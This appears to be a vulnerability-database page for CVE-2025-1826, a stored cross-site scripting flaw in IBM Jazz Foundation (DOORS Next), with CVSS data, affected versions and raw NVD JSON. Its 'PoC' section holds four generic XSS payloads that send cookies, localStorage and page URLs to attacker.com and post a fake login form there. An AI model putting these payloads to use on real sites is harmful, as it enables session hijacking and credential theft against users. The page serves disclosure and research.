CVE-2025-1826

Description

IBM Engineering Requirements Management DOORS Next (IBM Jazz Foundation 7.0.2 to 7.0.2 iFix034, 7.0.3 to 7.0.3 iFix016, and 7.1.0 to 7.1.0 iFix004) is vulnerable to stored cross-site scripting. This vulnerability allows authenticated users on the host network to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:jazz_foundation:7.0.2:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix001:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix002:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix003:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix004:*:*:*:*:*:* - VULNERABLE

IBM Jazz Foundation 7.0.2 至 7.0.2 iFix034

IBM Jazz Foundation 7.0.3 至 7.0.3 iFix016

IBM Jazz Foundation 7.1.0 至 7.1.0 iFix004

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Stored XSS PoC for CVE-2025-1826 -->
<!-- Attack scenario: Inject malicious JavaScript into user-controllable input fields -->

<!-- Payload 1: Cookie stealing via image request -->
<script>new Image().src="https://attacker.com/steal?c="+document.cookie;</script>

<!-- Payload 2: Session token exfiltration -->
<script>
fetch('https://attacker.com/exfil', {
    method: 'POST',
    body: JSON.stringify({
        cookies: document.cookie,
        url: window.location.href,
        localStorage: JSON.stringify(localStorage)
    })
});
</script>

<!-- Payload 3: Credential harvesting via fake login form -->
<script>
var f = document.createElement('form');
f.action = 'https://attacker.com/harvest';
f.method = 'POST';
f.innerHTML = '<input name="user" /><input name="pass" />';
document.body.appendChild(f);
f.submit();
</script>

<!-- Payload 4: Event handler injection (alternative bypass) -->
<img src=x onerror="fetch('https://attacker.com/?data='+document.cookie)">

<!-- Note: Actual exploitation requires:
     1. Valid low-privilege authenticated session
     2. Access to a field that renders user-supplied content without sanitization
     3. Victim user to view the malicious content (UI:R requirement) -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-1826
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-1826
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-1826/
[4] VulDB https://vuldb.com/cve/CVE-2025-1826
[5] https://www.ibm.com/support/pages/node/7247292

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-1826", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:15:58.683", "lastModified": "2025-12-12T19:53:55.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Engineering Requirements Management DOORS Next (IBM Jazz Foundation 7.0.2 to 7.0.2 iFix034, 7.0.3 to 7.0.3 iFix016, and 7.1.0 to 7.1.0 iFix004) is vulnerable to stored cross-site scripting. This vulnerability allows authenticated users on the host network to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:-:*:*:*:*:*:*", "matchCriteriaId": "441ECFF5-7336-4638-8E9A-FDCB25B64455"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix001:*:*:*:*:*:*", "matchCriteriaId": "5732ED04-5F96-4599-93E6-7584885D2B93"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix002:*:*:*:*:*:*", "matchCriteriaId": "95526B74-096B-4B77-9335-753403C8FD4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix003:*:*:*:*:*:*", "matchCriteriaId": "261024C4-6F61-412E-8AD1-735E691BF47C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix004:*:*:*:*:*:*", "matchCriteriaId": "D9F6D0FB-E128-478F-B8AA-D19E9C4B48C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix005:*:*:*:*:*:*", "matchCriteriaId": "5369A9EE-5DA1-4FDC-8D61-7B34AC7CA2E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix006:*:*:*:*:*:*", "matchCriteriaId": "8A8996A8-891F-45F3-8950-4D3CDC31FBF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix007:*:*:*:*:*:*", "matchCriteriaId": "5C3158CF-3B4D-424E-9D71-32949A46ADD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix008a:*:*:*:*:*:*", "matchCriteriaId": "FC5C310D-EF92-4B9F-BAB7-1E768336AAF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix009:*:*:*:*:*:*", "matchCriteriaId": "08DAB6ED-24E3-4041-8230-1D2C15904FD1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix010:*:*:*:*:*:*", "matchCriteriaId": "782AB41B-3C55-4701-8F6B-2CDA70A9D66B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix011:*:*:*:*:*:*", "matchCriteriaId": "D5CAE940-F815-472B-AFA7-9E25D04BC519"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix012:*:*:*:*:*:*", "matchCriteriaId": "E853B8B5-735D-4873-9377-CFBBC61C6196"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix013:*:*:*:*:*:*", "matchCriteriaId": "2690EEF9-0D5F-4C30-823E-9ABE703007E3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix014:*:*:*:*:*:*", "matchCriteriaId": "193C0380-AD9F-4823-81D8-AB2B95E0C200"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix016:*:*:*:*:*:*", "matchCriteriaId": "B5ABD29B-3AF6-4760-A3CA-356CD933370A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix017:*:*:*:*:*:*", "matchCriteriaId": "D0A30F1F-59AA-485F-853B-B8DF430C2787"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix018:*:*:*:*:*:*", "matchCriteriaId": "DFEAFE85-375D-47DD-8D29-BB8AC17EC557"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix020a:*:*:*:*:*:*", "matchCriteriaId": "899CFB7F-21AD-47AF-8494-3D3E0E243130"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix021:*:*:*:*:*:*", "matchCriteriaId": "563E2A40-CB7C-456C-9915-2F5D01FF37AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix022:*:*:*:*:*:*", "matchCriteriaId": "91379E62-5D52-4E70-BB55-5CD44D441808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix023:*:*:*:*:*:*", "matchCriteriaId": "2E60A806-F8F5-464C-95CD-75F5D7EB9065"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix024:*:*:*:*:*:*", "matchCriteriaId": "6FF16BF8-714D-4FB0-88BA-CF0D6B5B355E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_foundation:7.0.2:ifix025:*:*:*:*:*:*", "matchCriteriaId": "5EBC2E3B-028B-4822-B5C9-B876C99E82C5" ... (truncated)